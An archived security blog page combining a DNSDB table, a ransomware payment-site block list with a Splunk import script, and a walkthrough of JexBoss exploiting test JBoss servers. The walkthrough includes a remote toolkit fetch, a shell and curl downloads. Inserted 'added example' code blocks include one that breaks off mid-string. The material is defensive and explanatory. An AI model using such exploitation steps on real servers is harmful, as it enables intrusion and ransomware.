<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_dw6w3yzfw6.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">dw6w3yzfw6.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_dw6w3yzfw6.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">5</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_i6myzht210.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">i6myzht210.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_i6myzht210.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">5</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-15 22:45:24 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-15 22:45:24 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_k8v362jbh7.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">k8v362jbh7.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_k8v362jbh7.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:59:55 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:59:55 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_s4ddlkd49j.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">s4ddlkd49j.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_s4ddlkd49j.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:56:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:56:36 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_t59hykhmfc.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">t59hykhmfc.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_t59hykhmfc.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:18:09 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_thej35t3rpwns.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">thej35t3rpwns.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_thej35t3rpwns.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
</tbody><thead>
<tr id="querystatus" style="font-weight: bold;"><td colspan="3">Returned 30 RRsets in 0.04 seconds.</td></tr>
<tr><td></td></tr>
</thead></table>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo}
</style></div>
Mila Parkour (http://www.blogger.com/profile/05026389826489033821)<br />
<br />
<b>Threat Intel - Ransomware Payment Sites Feed</b> (2017-01-10)<br />
There are a number of great sites dedicated to ransomware threat feeds. The most valuable of these list the download/dropper sites and the C2 sites.<br />
<br />
These lists of observables help incident response teams limit the spread of an infection throughout their local environments.<br />
<br />
Unfortunately, malware frequently slips in under the radar, and we find that individual users try to rectify the problem on their own: they visit the payment site and pay the ransom, which keeps IT teams in the dark. Regardless of where you stand on paying, a hidden ransom payment makes it hard for teams to build countermeasures or even to realize they have a problem.<br />
<br />
Using a spare Raspberry Pi, we've started mapping out ransomware domains. Our project operationalizes data from Harry71, Ahmia and VisiTOR; their excellent work in mapping TOR makes this feed possible. Finally, as we come across malware samples and analyze them, the results of that analysis are fed into the tool.<br />
<br />
After enumerating the .onion sites, we combine the data with known Web2Tor gateways that are commonly used by malware authors and compile a suggested notification or block list.<br />
<br />
Because our research is largely automated, there may be occasional legitimate .onion sites on the list. We do our very best to screen and remove these quickly.<br />
<br />
Our goal is to turn this data into actionable indicators of warning that IT/IR teams can load into their IDS or SIEM. Ideally you would never see these observables in your environment, but if they do hit, it is important to act on them immediately.<br />
<br />
For example, here is a snippet of a feed generated on December 25, 2016:<br />
<br />
<blockquote class="tr_bq">
# Ransomware Payment Sites on TOR.<br />
# List provided with no warranty by DeepEndResearch.<br />
# Commercial use with permission only.<br />
# There may be false positives in this list. It should be used as an Indicator of Warning list only.<br />
# This file is updated daily.<br />
qli26fihoid5qwo5.onion<br />
qli26fihoid5qwo5.anonym.to<br />
qli26fihoid5qwo5.hiddenservice.net<br />
qli26fihoid5qwo5.onion.cab<br />
qli26fihoid5qwo5.onion.nu<br />
qli26fihoid5qwo5.onion.to<br />
qli26fihoid5qwo5.s1.tor-gateways.de<br />
qli26fihoid5qwo5.s2.tor-gateways.de<br />
qli26fihoid5qwo5.s3.tor-gateways.de<br />
qli26fihoid5qwo5.s4.tor-gateways.de<br />
qli26fihoid5qwo5.s5.tor-gateways.de<br />
qli26fihoid5qwo5.tor2web.fi<br />
qli26fihoid5qwo5.onion?lang=de<br />
qli26fihoid5qwo5.anonym.to<br />
qli26fihoid5qwo5.hiddenservice.net<br />
qli26fihoid5qwo5.onion.cab<br />
qli26fihoid5qwo5.onion.nu<br />
qli26fihoid5qwo5.onion.to<br />
qli26fihoid5qwo5.s1.tor-gateways.de<br />
qli26fihoid5qwo5.s2.tor-gateways.de<br />
qli26fihoid5qwo5.s3.tor-gateways.de<br />
qli26fihoid5qwo5.s4.tor-gateways.de<br />
qli26fihoid5qwo5.s5.tor-gateways.de<br />
qli26fihoid5qwo5.tor2web.fi</blockquote>
<br />
Our feed is updated daily and posted here:<br />
<br />
https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt<br />
<br />
We make several attempts, within 24-48 hours, to remove sites that are no longer operational.<br />
<br />
One way to operationalize this data in a <a href="http://splunk.com/">Splunk</a> environment is to convert the feed to a CSV lookup file. The script below does that; run it as a daily cron job on your Splunk search head:<br />
<br />
<blockquote class="tr_bq">
<pre>#!/usr/bin/env python3
# Fetch the DeepEndResearch ransomware payment-site feed and write it as a
# Splunk lookup CSV. Run daily from cron on the search head.
import csv
import requests

FEED_URL = 'https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt'
NOTE = 'DeepEndResearch Suspected Ransomware Payment Site'

if __name__ == '__main__':
    # Keep TLS verification on: a tampered feed would poison the lookup table.
    resp = requests.get(FEED_URL, timeout=30)
    resp.raise_for_status()
    with open('ransomware_payment_site.csv', 'w', newline='') as fh:
        writer = csv.writer(fh)
        writer.writerow(['domain', 'notes'])
        for line in resp.text.splitlines():
            line = line.strip()
            # Skip the comment header and anything that is not a hostname.
            if line.startswith('#') or '.' not in line:
                continue
            writer.writerow([line, NOTE])
</pre>
</blockquote>
Then set a query using the <a href="https://docs.splunk.com/Documentation/Splunk/6.5.1/SearchReference/Inputlookup">inputlookup</a> option at a schedule that works for your environment.<br />
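The feed-to-lookup step above, carried a little further as an added example (this is not the post's script): it cleans the feed, which in the December 2016 snippet carries a '.onion?lang=de' entry that would otherwise land in the lookup verbatim, renders the same domain,notes CSV, and matches proxy log hostnames against it. The feed text and log hostnames are constructed; the onion-id match goes beyond the exact lookup and is this example's own addition.

```python
"""Clean the ransomware payment-site feed, build the Splunk lookup and match
proxy log hostnames against it (added example, not the post's script)."""
import csv
import io
import re

# Constructed sample in the feed's format (header comments, one host per
# line). The onion name is made up; real entries come from the daily feed.
SAMPLE_FEED = """\
# Ransomware Payment Sites on TOR.
# This file is updated daily.
abcdefghij234567.onion
abcdefghij234567.onion.to
abcdefghij234567.tor2web.fi
abcdefghij234567.onion?lang=de
"""

# A v2 onion name is 16 base32 characters, a v3 name is 56; tor2web-style
# gateways expose it as the leftmost label (<onion>.onion.to, <onion>.tor2web.fi).
ONION_LABEL_RE = re.compile(r'^(?:[a-z2-7]{16}|[a-z2-7]{56})$')


def parse_feed(text):
    """Return the cleaned set of hostnames in a feed body.

    Comment and blank lines are skipped, and anything after '?' or '/' is
    dropped so a stray query string does not become a lookup entry.
    """
    hosts = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        host = re.split(r'[?/]', line, maxsplit=1)[0].lower()
        if '.' in host:
            hosts.add(host)
    return hosts


def onion_id(host):
    """Leftmost label of a host if it looks like an onion service name."""
    label = host.split('.', 1)[0]
    return label if ONION_LABEL_RE.match(label) else None


def build_lookup_csv(hosts):
    """Render the Splunk lookup (domain,notes) as text; the post writes it
    to ransomware_payment_site.csv on the search head."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(['domain', 'notes'])
    for host in sorted(hosts):
        writer.writerow([host, 'DeepEndResearch Suspected Ransomware Payment Site'])
    return buf.getvalue()


def match_proxy_hosts(log_hosts, feed_hosts):
    """Return (host, reason) for each logged hostname that hits the feed.

    Exact matches reproduce the inputlookup join. As a generalisation beyond
    the exact lookup, a host whose leftmost label is an onion id present in
    the feed is flagged too, catching the same service behind a gateway the
    feed does not list yet.
    """
    feed_ids = {onion_id(h) for h in feed_hosts} - {None}
    hits = []
    for host in log_hosts:
        host = host.lower().rstrip('.')
        if host in feed_hosts:
            hits.append((host, 'exact'))
        elif onion_id(host) in feed_ids:
            hits.append((host, 'onion-id'))
    return hits
```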
<br />
We hope that you find this feed useful. Please feel free to comment or offer us suggestions!<br />
<br />
Posted by Anonymous.<br />
<br />
<h2>JBoss exploits - View from a Victim</h2>
Published 2016-04-12.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;">
<b>JBoss</b><br />
Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.</div>
<div style="text-align: justify;">
Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.</div>
<div style="text-align: justify;">
Exploits against <a href="https://en.wikipedia.org/wiki/JBoss_Enterprise_Application_Platform" target="_blank">JBoss</a> are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "<a href="http://blog.talosintel.com/2016/03/samsam-ransomware.html#more" target="_blank">SamSam: The Doctor Will See You, After He Pays the Ransom</a>"</div>
<div style="text-align: justify;">
Note that "<b>JexBoss</b>" is described as the exploit tool of choice. JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments. </div>
<div style="text-align: justify;">
It is reasonable to assume that many of these deployments remain vulnerable.</div>
<div style="text-align: justify;">
While healthcare and hospitals are the target 'du jour', other high-profile industry segments running old JBoss may be targeted next.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.</div>
<div style="text-align: justify;">
We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim. We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Our test environment consisted of two Amazon EC2 instances running Red Hat Linux. I configured the first instance to run JBoss v6, and the other to run JBoss v4.</div>
<div style="text-align: justify;">
Please don't bother to test or "attack" the EC2 instances I used. They are firewalled to the world, except to my IP :)</div>
<div style="text-align: justify;">
The attacking environment was a simple Debian Linux VM with JexBoss installed.</div>
<br />
<h3 style="text-align: left;">
<u>Attacking JBoss 4</u></h3>
<div>
<div style="text-align: justify;">
Running JexBoss against a vulnerable host is quite trivial. You simply provide the URL of the JBoss instance, and hit Enter.</div>
<div style="text-align: justify;">
The following image shows how JexBoss found the JBoss web-console, jmx-console and JMXInvokerServlet to be vulnerable.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0fZ5qbzZXuthM0c0mwiBdpTYfrkZJRIRGBAg6orzUSTrDoR-ZK4bjcuLwAAwFGjVfpi_z4RZmrwjvGSVZTD90yzYWuj2AGT9YrNZOaZ8Ovl3b9D756ZOETfCKFjjiUQj7eEIvAK-3-cg/s1600/jexboss_attacking_4a.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0fZ5qbzZXuthM0c0mwiBdpTYfrkZJRIRGBAg6orzUSTrDoR-ZK4bjcuLwAAwFGjVfpi_z4RZmrwjvGSVZTD90yzYWuj2AGT9YrNZOaZ8Ovl3b9D756ZOETfCKFjjiUQj7eEIvAK-3-cg/s640/jexboss_attacking_4a.jpg" width="590" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">JexBoss attack against a JBoss v4 host</td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
In this example, I ran the exploit against jmx-console. I then ran the Linux 'ls' command to display the files on the compromised host.</div>
<div style="text-align: justify;">
Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "<i>jbossass.war</i>" from '<i><b>joaomatosf.com</b></i>'.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaMhyr-Dm9iSPfQLb6joBDuOnoV_U3KRTZI8WC8DsMXP2Jl3Ci4z0zsi1spjGv0_l6JU_ijuzpsFhOVkv8Bf-xYrS0mOWTWJNWBK13_uIFGk9VHpkSkOlBYJiNYa2afh9HUwYLrM8ZRbo/s1600/jexboss_fetch_remote.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaMhyr-Dm9iSPfQLb6joBDuOnoV_U3KRTZI8WC8DsMXP2Jl3Ci4z0zsi1spjGv0_l6JU_ijuzpsFhOVkv8Bf-xYrS0mOWTWJNWBK13_uIFGk9VHpkSkOlBYJiNYa2afh9HUwYLrM8ZRbo/s640/jexboss_fetch_remote.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Victim server fetching remote exploit toolkit</td></tr>
</tbody></table>
<br />
<br />
<div style="text-align: justify;">
Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.</div>
<div style="text-align: justify;">
Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
In this next example, I ran the exploit against the JBoss web-console.</div>
<div style="text-align: justify;">
Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice. Note how I used the 'curl' command to fetch a remote text file and display it on the console.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJn23xeLLTYwJNLyZQ14ID0K9IV3ivrSwnK8wVsI6hkQMADx2qVmCVNrgeGVYpAvSyVE04QahyOo2VEZauLiHKZDYf5yfg71OEERF3R2QhFYOmafZDNnSTMha2NeXj0n5wyp1gebvPBCA/s1600/jexboss_attacking_4b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="587" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJn23xeLLTYwJNLyZQ14ID0K9IV3ivrSwnK8wVsI6hkQMADx2qVmCVNrgeGVYpAvSyVE04QahyOo2VEZauLiHKZDYf5yfg71OEERF3R2QhFYOmafZDNnSTMha2NeXj0n5wyp1gebvPBCA/s640/jexboss_attacking_4b.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Using JexBoss to fetch a remote file via the compromised host.</td></tr>
</tbody></table>
<div>
<br /></div>
<div style="text-align: justify;">
In this example, I fetched the same file and saved it to the compromised host. Running the Linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwV9mH2uS7OZlWSyxlEgMDu8ILRfGScAVw8iO8OydUYdXfa717ANONtYB5tpOIWsjCdnAdDUDM6qMma0mNyaEZCH-_2zwFtMXj0KUUtcrRcjsmSHPdjI_0NlEl7XkmclS3xUDWemiyws/s1600/jexboss_attacking_4c.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwV9mH2uS7OZlWSyxlEgMDu8ILRfGScAVw8iO8OydUYdXfa717ANONtYB5tpOIWsjCdnAdDUDM6qMma0mNyaEZCH-_2zwFtMXj0KUUtcrRcjsmSHPdjI_0NlEl7XkmclS3xUDWemiyws/s640/jexboss_attacking_4c.jpg" width="569" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: 12.8px;">Using JexBoss to fetch and save a remote file to the compromised host.</span></td></tr>
</tbody></table>
<div>
<br /></div>
<div style="text-align: justify;">
Here is a look at a log segment from the victim host after the exploits were run. A few exceptions are thrown, and Warnings and Info are logged.</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0vjVMZNYS9AWxikWxLXMF4kSMiF9Kgtu-csTquPyy88AhyXPsgr7X9c6OsNNlE60XfKYh9HyLoumJN_gqwVtvkX3oWkboUtAPV7_QedJv71bYr72_9FrvmI_nxSOcKuoQc8hz0JjUWRo/s1600/warnings.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0vjVMZNYS9AWxikWxLXMF4kSMiF9Kgtu-csTquPyy88AhyXPsgr7X9c6OsNNlE60XfKYh9HyLoumJN_gqwVtvkX3oWkboUtAPV7_QedJv71bYr72_9FrvmI_nxSOcKuoQc8hz0JjUWRo/s640/warnings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Log file segment showing Warnings and Info after JexBoss exploit</td></tr>
</tbody></table>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Attacking JBoss v6</u></h3>
<div>
<div style="text-align: justify;">
Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.</div>
<div style="text-align: justify;">
However, the jmx-console is as easily exploited as it was in JBoss version 4.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmIwRpyqUAVq3mrwfTdmbEXN3GMNlhiaTkbhix4sl_Bk1-HHfQk7encONyELKXBr2WgaA1rnj3w4zOBYbl6HTuSo0ext-mT9U0pWQJkm8LyAEv0b9CVBo3UBO1Rvnfo6oxQEBlJnR8v0/s1600/jexboss_attacking_6a.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmIwRpyqUAVq3mrwfTdmbEXN3GMNlhiaTkbhix4sl_Bk1-HHfQk7encONyELKXBr2WgaA1rnj3w4zOBYbl6HTuSo0ext-mT9U0pWQJkm8LyAEv0b9CVBo3UBO1Rvnfo6oxQEBlJnR8v0/s640/jexboss_attacking_6a.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">JexBoss exploit against the jmx-console on a JBoss v6 host</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9r8MYEPl1LXT0TIrSh2WcvZLYtpM7O38ulh82X55r_xP_GCcNWS-t32vwPvpYY1vsFXqR5MuXGt7Y3cWaKpb1aQcS-g8HaRpoX_mLl09Y10lHYzMahoPKh_e3i_s8VP7FvN00qb79Xg/s1600/jexboss_attacking_6b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="604" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9r8MYEPl1LXT0TIrSh2WcvZLYtpM7O38ulh82X55r_xP_GCcNWS-t32vwPvpYY1vsFXqR5MuXGt7Y3cWaKpb1aQcS-g8HaRpoX_mLl09Y10lHYzMahoPKh_e3i_s8VP7FvN00qb79Xg/s640/jexboss_attacking_6b.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: 12.8px;">JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch</span></td></tr>
</tbody></table>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Summary:</u></h3>
<div>
<div style="text-align: justify;">
By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.</div>
<div style="text-align: justify;">
With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it is of critical urgency that any JBoss instance be checked and patched.</div>
<div style="text-align: justify;">
I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at <a href="http://www.cvedetails.com/vulnerability-list.php?vendor_id=1845&product_id=&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&month=0&cweid=0&order=3&trc=10&sha=1d05adb14b27835207e2b16060f6371f17f9652e" target="_blank">CVEDetails - JBoss</a></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim. We hope that this blog post helps raise further awareness of this serious threat, and provides some additional information to help detect and defend against these attacks.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: left;">
<u>Files and Additional Information:</u></h3>
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
IDS Signatures:</h4>
<div>
<div>
The following Snort and Emerging Threats IDS signatures will detect these JexBoss probes and exploits.</div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt</span></div>
</div>
<div>
<br /></div>
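The IDS signatures above fire on the wire; the same JexBoss sequence (probe of the three entry points, deployment through the console, then requests into the deployed toolkit) is also visible in the JBoss access log on the victim itself. The following is an added example, not the post's own code: the log lines are constructed, and the /jbossass context path is an assumption derived from the toolkit name jbossass.war (a WAR normally deploys under its own name).

```python
"""Flag JexBoss-style activity in a JBoss/Apache access log (added example)."""
import re
from collections import Counter

# Combined-log-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b')

# The three JBoss entry points JexBoss reports as vulnerable in the post, plus
# the context path the fetched jbossass.war would deploy under (assumption:
# the WAR name becomes the context path, the JBoss default).
WATCHED = {
    '/jmx-console': 'jmx-console',
    '/web-console': 'web-console',
    '/invoker/JMXInvokerServlet': 'JMXInvokerServlet',
    '/jbossass': 'jbossass (deployed toolkit, assumed context path)',
}

# Constructed sample lines; the addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Apr/2016:21:58:01 -0400] "HEAD /jmx-console/ HTTP/1.1" 200 -
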